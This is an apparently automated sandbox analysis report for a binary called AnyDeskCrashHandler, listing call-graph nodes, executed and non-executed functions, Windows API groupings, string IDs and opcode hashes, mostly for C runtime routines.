7795->7796 7797 7ff7aa95724d 7796->7797 7798 7ff7aa957265 7796->7798 7799 7ff7aa958284 _set_fmode 7 API calls 7797->7799 7800 7ff7aa956f70 34 API calls 7798->7800 7801 7ff7aa957252 7799->7801 7805 7ff7aa957281 7800->7805 7802 7ff7aa958b3c __free_lconv_mon 7 API calls 7801->7802 7802->7782 7803 7ff7aa957287 7804 7ff7aa958b3c __free_lconv_mon 7 API calls 7803->7804 7804->7782 7805->7803 7806 7ff7aa9572cc 7805->7806 7807 7ff7aa9572b3 7805->7807 7810 7ff7aa958b3c __free_lconv_mon 7 API calls 7806->7810 7808 7ff7aa958b3c __free_lconv_mon 7 API calls 7807->7808 7809 7ff7aa9572bc 7808->7809 7811 7ff7aa958b3c __free_lconv_mon 7 API calls 7809->7811 7810->7803 7811->7782 7813 7ff7aa958700 _CreateFrameInfo 34 API calls 7812->7813 7814 7ff7aa95776d 7813->7814 7815 7ff7aa9577a1 7814->7815 7816 7ff7aa958284 _set_fmode 7 API calls 7814->7816 7815->7757 7817 7ff7aa957796 7816->7817 7818 7ff7aa956c30 _invalid_parameter_noinfo 34 API calls 7817->7818 7818->7815 7820 7ff7aa952e3a 7819->7820 7822 7ff7aa952e33 7819->7822 7823 7ff7aa957be0 7820->7823 7822->7780 7826 7ff7aa95781c 7823->7826 7825 7ff7aa957c22 7825->7822 7827 7ff7aa957838 7826->7827 7830 7ff7aa957894 7827->7830 7829 7ff7aa957841 7829->7825 7831 7ff7aa9578c0 7830->7831 7832 7ff7aa957955 7830->7832 7831->7832 7833 7ff7aa957931 7831->7833 7840 7ff7aa95b944 7831->7840 7832->7829 7833->7832 7835 7ff7aa95b944 9 API calls 7833->7835 7837 7ff7aa95794b 7835->7837 7836 7ff7aa957927 7838 7ff7aa958b3c __free_lconv_mon 7 API calls 7836->7838 7839 7ff7aa958b3c __free_lconv_mon 7 API calls 7837->7839 7838->7833 7839->7832 7841 7ff7aa95b966 7840->7841 7844 7ff7aa95b983 7840->7844 7842 7ff7aa95b974 7841->7842 7841->7844 7843 7ff7aa958284 _set_fmode 7 API calls 7842->7843 7846 7ff7aa95b979 __scrt_get_show_window_mode 7843->7846 7847 7ff7aa95d3a4 7844->7847 7846->7836 7848 7ff7aa95d3b9 7847->7848 7849 7ff7aa95d3c3 7847->7849 7850 7ff7aa958a64 8 API calls 7848->7850 7851 7ff7aa95d3c8 7849->7851 7857 7ff7aa95d3cf _set_fmode 7849->7857 7856 7ff7aa95d3c1 7850->7856 7854 7ff7aa958b3c __free_lconv_mon 7 API calls 7851->7854 7852 7ff7aa95d3d5 7855 7ff7aa958284 _set_fmode 7 API calls 7852->7855 7853 7ff7aa95d402 RtlReAllocateHeap 7853->7856 7853->7857 7854->7856 7855->7856 7856->7846 7857->7852 7857->7853 7859 7ff7aa95971d __vcrt_InitializeCriticalSectionEx 7858->7859 7860 7ff7aa959731 7858->7860 7862 7ff7aa9581f8 7 API calls 7859->7862 7861 7ff7aa958114 34 API calls 7860->7861 7865 7ff7aa95975f 7861->7865 7863 7ff7aa95972a 7862->7863 7866 7ff7aa952650 _log10_special 4 API calls 7863->7866 7874 7ff7aa9595bc 7865->7874 7867 7ff7aa9571f2 7866->7867 7868 7ff7aa956f70 7867->7868 7870 7ff7aa956fae 7868->7870 7869 7ff7aa95a3b0 34 API calls 7869->7870 7870->7869 7872 7ff7aa95701a 7870->7872 7871 7ff7aa95710b 7871->7795 7872->7871 7873 7ff7aa95a3b0 34 API calls 7872->7873 7873->7872 7875 7ff7aa9595fb 7874->7875 7878 7ff7aa9595e0 7874->7878 7876 7ff7aa95a488 WideCharToMultiByte 7875->7876 7881 7ff7aa959600 7875->7881 7877 7ff7aa959657 7876->7877 7879 7ff7aa95965e __vcrt_InitializeCriticalSectionEx 7877->7879 7877->7881 7882 7ff7aa959689 7877->7882 7878->7863 7879->7878 7884 7ff7aa9581f8 7 API calls 7879->7884 7880 7ff7aa958284 _set_fmode 7 API calls 7880->7878 7881->7878 7881->7880 7883 7ff7aa95a488 WideCharToMultiByte 7882->7883 7883->7879 7885 7ff7aa95966b 7884->7885 7886 7ff7aa958284 _set_fmode 7 API calls 7885->7886 7886->7878 7358 7ff7aa95d371 7359 7ff7aa958284 _set_fmode 7 API calls 7358->7359 7360 7ff7aa95d376 7359->7360 7361 7ff7aa956c30 _invalid_parameter_noinfo 34 API calls 7360->7361 7362 7ff7aa95d381 7361->7362

                                                                                                      Executed Functions

                                                                                                      Function 00007FF7AA951290 Relevance: 56.7, APIs: 8, Strings: 24, Instructions: 707sleepCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 7ff7aa951290-7ff7aa9512d2 GetCommandLineW CommandLineToArgvW 1 7ff7aa9512da-7ff7aa951311 0->1 2 7ff7aa9512d4 0->2 3 7ff7aa95131e-7ff7aa95146f call 7ff7aa9523f0 * 2 1->3 4 7ff7aa951313-7ff7aa951319 1->4 2->1 12 7ff7aa951472-7ff7aa95147c 3->12 5 7ff7aa9515d1-7ff7aa95161c call 7ff7aa952650 4->5 13 7ff7aa95147e-7ff7aa951484 12->13 14 7ff7aa951486-7ff7aa951496 12->14 13->12 13->14 15 7ff7aa95149c-7ff7aa9514b5 14->15 16 7ff7aa951557-7ff7aa951566 14->16 19 7ff7aa9514c0-7ff7aa9514cc 15->19 17 7ff7aa951568-7ff7aa95157a 16->17 18 7ff7aa95159a-7ff7aa95159e 16->18 20 7ff7aa95157c-7ff7aa95158f 17->20 21 7ff7aa951595 call 7ff7aa9526ac 17->21 18->5 24 7ff7aa9515a0-7ff7aa9515b2 18->24 22 7ff7aa9514ce-7ff7aa9514d4 19->22 23 7ff7aa9514d6-7ff7aa9514d9 19->23 20->21 25 7ff7aa95161d-7ff7aa951622 call 7ff7aa956c50 20->25 21->18 22->19 22->23 23->16 27 7ff7aa9514db-7ff7aa9514f6 call 7ff7aa9567f8 23->27 28 7ff7aa9515c9-7ff7aa9515cc call 7ff7aa9526ac 24->28 29 7ff7aa9515b4-7ff7aa9515c7 24->29 35 7ff7aa951623-7ff7aa951626 CloseHandle 25->35 36 7ff7aa9514fe 27->36 37 7ff7aa9514f8 27->37 28->5 29->25 29->28 38 7ff7aa95162c-7ff7aa952098 call 7ff7aa952130 call 7ff7aa9523f0 call 7ff7aa9523e0 call 7ff7aa9511c0 call 7ff7aa9520a0 call 7ff7aa9523f0 call 7ff7aa9523e0 call 7ff7aa9511c0 call 7ff7aa955f68 35->38 39 7ff7aa951503-7ff7aa95151f Sleep OpenProcess 36->39 37->36 39->38 40 7ff7aa951525-7ff7aa951534 GetExitCodeProcess 39->40 40->35 42 7ff7aa95153a-7ff7aa951541 40->42 42->35 44 7ff7aa951547-7ff7aa951555 CloseHandle 42->44 44->39
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle$Process$CommandLine_invalid_parameter_noinfo_noreturn$ArgvCodeConcurrency::cancel_current_taskCreateExitObjectOpenSingleSleepWait
                                                                                                      • String ID: "$1$4$E$O$^$^$c$e$e$e$f$f$g$g$k$o$q$q$u$v$v$y${
                                                                                                      • API String ID: 2156799773-2036417650
                                                                                                      • Opcode ID: 55396bdfbc0e32f47eca3f0b08b3f9269952f8e0748cca96d6bd72cea9e19cbb
                                                                                                      • Instruction ID: 19226b8963e33826b7fdf7547bb55d06f13c431aba2bb5a7a4a892657a4d53f2
                                                                                                      • Opcode Fuzzy Hash: 55396bdfbc0e32f47eca3f0b08b3f9269952f8e0748cca96d6bd72cea9e19cbb
                                                                                                      • Instruction Fuzzy Hash: EA82325AA16252C9F320BF71E4012FD73F0FF18709B419076EA888B675EB7D9446C72A
                                                                                                      Function 00007FF7AA95B490 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeLibraryProc
                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                      • API String ID: 3013587201-537541572
                                                                                                      • Opcode ID: b30e28bd0cd48f27bf1a31ff5ea156d3804f5e8b499c2477a6b867bb355f5e73
                                                                                                      • Instruction ID: e63d7ebdd406cb08e0deaee27dafcd4962fb7c491c817fdb7a58a57c3bf11ef8
                                                                                                      • Opcode Fuzzy Hash: b30e28bd0cd48f27bf1a31ff5ea156d3804f5e8b499c2477a6b867bb355f5e73
                                                                                                      • Instruction Fuzzy Hash: 1241C125B1AA12C5FE15AB1698116B5A291BF49BA0F874175DD0EC77A4EF3CE40B8320
                                                                                                      Function 00007FF7AA9511C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44processsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle$CreateObjectProcessSingleWait
                                                                                                      • String ID: h
                                                                                                      • API String ID: 2059082233-2439710439
                                                                                                      • Opcode ID: 5b8cf0092febe8dd4bed2618a947a67060a1088977b281d69a45aa787853e3eb
                                                                                                      • Instruction ID: 05a3a8be96edc1ca54a77a4dd8bc0f0d6ac34b8f37e6d69283514dc491c2bfab
                                                                                                      • Opcode Fuzzy Hash: 5b8cf0092febe8dd4bed2618a947a67060a1088977b281d69a45aa787853e3eb
                                                                                                      • Instruction Fuzzy Hash: 8F113B23E1DBC1C2E750DB24E85436EB3A0FBD9784F525339EA9D86A24DF78D0958B00
                                                                                                      Function 00007FF7AA955E2C Relevance: 4.5, APIs: 3, Instructions: 15COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                      • String ID:
                                                                                                      • API String ID: 1703294689-0
                                                                                                      • Opcode ID: 538b37713ac9a40f89ee0efd905f114fa4b6245a37a66674d184e74d9b678618
                                                                                                      • Instruction ID: e824600cc66b3554a6a647ee6659cad667f46d275ce807b955f9f80b2745b625
                                                                                                      • Opcode Fuzzy Hash: 538b37713ac9a40f89ee0efd905f114fa4b6245a37a66674d184e74d9b678618
                                                                                                      • Instruction Fuzzy Hash: 79D06720B1A646D2FE587B71689A17892115F48745F9615BCC90EC73A3DE2EA80F8321
                                                                                                      Function 00007FF7AA9527DC Relevance: 3.1, APIs: 2, Instructions: 98COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                      • String ID:
                                                                                                      • API String ID: 3070443116-0
                                                                                                      • Opcode ID: 4fc66f674771a642c276f3b7107815a4453248af2fe5cf5af13cbfa4e39b06b6
                                                                                                      • Instruction ID: 4b9fdce453c25e1b6182bd71b6e2cca11d28f97ea71e0cab70650d7db260d5d0
                                                                                                      • Opcode Fuzzy Hash: 4fc66f674771a642c276f3b7107815a4453248af2fe5cf5af13cbfa4e39b06b6
                                                                                                      • Instruction Fuzzy Hash: D0310711E0A243C1FE58BB6595533B9A290AF51344FD604B9EA0ECB2F3DE2CA54F8731
                                                                                                      Function 00007FF7AA955D5D Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                      • String ID:
                                                                                                      • API String ID: 3947729631-0
                                                                                                      • Opcode ID: 096c50b28ef02ac97b7fbb41d5ffc398b2530bbda9989156a02e9da1b299d600
                                                                                                      • Instruction ID: 05951b23d8aa0ce08f56e2779035b228aae8716c7447f7e8b7391a56888dd2f1
                                                                                                      • Opcode Fuzzy Hash: 096c50b28ef02ac97b7fbb41d5ffc398b2530bbda9989156a02e9da1b299d600
                                                                                                      • Instruction Fuzzy Hash: A221BF32E06606C9FF24AF64C4453AC33A0EB04318F950639DA1C86AE6DF79D54ACBA0

                                                                                                      Non-executed Functions

                                                                                                      Function 00007FF7AA952FB4 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 3140674995-0
                                                                                                      • Opcode ID: 8f52d899b0c822738a6be879117695353cf3926ba201aa6cbb5a93e39f724cd6
                                                                                                      • Instruction ID: a23a383e7b7f6aaed305a7b41020d7c4c865cd28d214ce86bad0d1ca290f9228
                                                                                                      • Opcode Fuzzy Hash: 8f52d899b0c822738a6be879117695353cf3926ba201aa6cbb5a93e39f724cd6
                                                                                                      • Instruction Fuzzy Hash: 0331127260AB81C5FB60AF60E8503EE7364FB84744F55407ADA4D87BA9DF38D549C710
                                                                                                      Function 00007FF7AA956964 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1239891234-0
                                                                                                      • Opcode ID: e2ea2adcc270ce3856cbe536865dde51c27872e812a40651d9b59811c8af80ab
                                                                                                      • Instruction ID: 583480adee616b36ca2f86d55203680ff014d15e669d41d47758e1cc60c1f6b1
                                                                                                      • Opcode Fuzzy Hash: e2ea2adcc270ce3856cbe536865dde51c27872e812a40651d9b59811c8af80ab
                                                                                                      • Instruction Fuzzy Hash: 6B317632619B82C5EF60DF25E8412ADB3A0FB89754F950175EA8D83B64DF3CD54ACB10
                                                                                                      Function 00007FF7AA954688 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 199 7ff7aa954688-7ff7aa9546f0 call 7ff7aa9555ac 202 7ff7aa9546f6-7ff7aa9546f9 199->202 203 7ff7aa954b51-7ff7aa954b57 call 7ff7aa957df4 199->203 202->203 204 7ff7aa9546ff-7ff7aa954705 202->204 206 7ff7aa95470b-7ff7aa95470f 204->206 207 7ff7aa9547d4-7ff7aa9547e6 204->207 206->207 211 7ff7aa954715-7ff7aa954720 206->211 209 7ff7aa9547ec-7ff7aa9547f0 207->209 210 7ff7aa954aa1-7ff7aa954aa5 207->210 209->210 212 7ff7aa9547f6-7ff7aa954801 209->212 214 7ff7aa954ade-7ff7aa954ae8 call 7ff7aa9540a0 210->214 215 7ff7aa954aa7-7ff7aa954aae 210->215 211->207 213 7ff7aa954726-7ff7aa95472b 211->213 212->210 216 7ff7aa954807-7ff7aa95480b 212->216 213->207 217 7ff7aa954731-7ff7aa95473b call 7ff7aa9540a0 213->217 214->203 228 7ff7aa954aea-7ff7aa954b09 call 7ff7aa952650 214->228 215->203 218 7ff7aa954ab4-7ff7aa954ad9 call 7ff7aa954b58 215->218 220 7ff7aa9549d1-7ff7aa9549dd 216->220 221 7ff7aa954811-7ff7aa95484c call 7ff7aa953788 216->221 217->228 232 7ff7aa954741-7ff7aa95476c call 7ff7aa9540a0 * 2 call 7ff7aa953a90 217->232 218->214 220->214 225 7ff7aa9549e3-7ff7aa9549e7 220->225 221->220 237 7ff7aa954852-7ff7aa95485b 221->237 229 7ff7aa9549f7-7ff7aa9549ff 225->229 230 7ff7aa9549e9-7ff7aa9549f5 call 7ff7aa953a50 225->230 229->214 236 7ff7aa954a05-7ff7aa954a12 call 7ff7aa953628 229->236 230->229 243 7ff7aa954a18-7ff7aa954a20 230->243 267 7ff7aa95478c-7ff7aa954796 call 7ff7aa9540a0 232->267 268 7ff7aa95476e-7ff7aa954772 232->268 236->214 236->243 241 7ff7aa95485f-7ff7aa954891 237->241 245 7ff7aa954897-7ff7aa9548a3 241->245 246 7ff7aa9549c4-7ff7aa9549cb 241->246 248 7ff7aa954b34-7ff7aa954b50 call 7ff7aa9540a0 * 2 call 7ff7aa957dc8 243->248 249 7ff7aa954a26-7ff7aa954a2a 243->249 245->246 250 7ff7aa9548a9-7ff7aa9548c8 245->250 246->220 246->241 248->203 252 7ff7aa954a2c-7ff7aa954a3b call 7ff7aa953a50 249->252 253 7ff7aa954a3d 249->253 254 7ff7aa9548ce-7ff7aa95490b call 7ff7aa953a64 * 2 250->254 255 7ff7aa9549b4-7ff7aa9549b9 250->255 262 7ff7aa954a3f-7ff7aa954a49 call 7ff7aa955644 252->262 253->262 279 7ff7aa95493e-7ff7aa954941 254->279 255->246 262->214 276 7ff7aa954a4f-7ff7aa954a9f call 7ff7aa9536b8 call 7ff7aa9538bc 262->276 267->207 282 7ff7aa954798-7ff7aa9547b8 call 7ff7aa9540a0 * 2 call 7ff7aa955644 267->282 268->267 273 7ff7aa954774-7ff7aa95477f 268->273 273->267 275 7ff7aa954781-7ff7aa954786 273->275 275->203 275->267 276->214 285 7ff7aa95490d-7ff7aa954933 call 7ff7aa953a64 call 7ff7aa954dc8 279->285 286 7ff7aa954943-7ff7aa95494a 279->286 304 7ff7aa9547ba-7ff7aa9547c4 call 7ff7aa955734 282->304 305 7ff7aa9547cf 282->305 300 7ff7aa954955-7ff7aa9549b2 call 7ff7aa9545b4 285->300 301 7ff7aa954935-7ff7aa954938 285->301 290 7ff7aa9549bb 286->290 291 7ff7aa95494c-7ff7aa954950 286->291 295 7ff7aa9549c0 290->295 291->254 295->246 300->295 301->279 309 7ff7aa954b2e-7ff7aa954b33 call 7ff7aa957dc8 304->309 310 7ff7aa9547ca-7ff7aa954b2d call 7ff7aa953bf0 call 7ff7aa955184 call 7ff7aa953d54 304->310 305->207 309->248 310->309
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                      • String ID: csm$csm$csm
                                                                                                      • API String ID: 849930591-393685449
                                                                                                      • Opcode ID: 8d3b3d0b136c0d1b28f68fd32bfa28257ab0fb809a93d522a45e85d31cd486b8
                                                                                                      • Instruction ID: e74cb4307af0fef6f7c4abe5c64f7f5d314723cc2e75d2239db82c725d0dfba3
                                                                                                      • Opcode Fuzzy Hash: 8d3b3d0b136c0d1b28f68fd32bfa28257ab0fb809a93d522a45e85d31cd486b8
                                                                                                      • Instruction Fuzzy Hash: F2D1B132909742C6FF60AB25D4423ADB7A1FB85788F910175DE4D87B66DF38E09AC710
                                                                                                      Function 00007FF7AA955F74 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: f$p$p
                                                                                                      • API String ID: 3215553584-1995029353
                                                                                                      • Opcode ID: 2db86bdd0b4c4cd621bef344b6d918bb67484dc4c7676120007631029398bba2
                                                                                                      • Instruction ID: 5e35bdd6d8a75176081c3e2006b6e227823697bc27b190e0fd0bd90a4d65254c
                                                                                                      • Opcode Fuzzy Hash: 2db86bdd0b4c4cd621bef344b6d918bb67484dc4c7676120007631029398bba2
                                                                                                      • Instruction Fuzzy Hash: BB129362E0E143C6FF607A15D15627AF6A1EB40754FCE4075E789866E8DF3CE48ACB20
                                                                                                      Function 00007FF7AA9558FC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmpDownload File
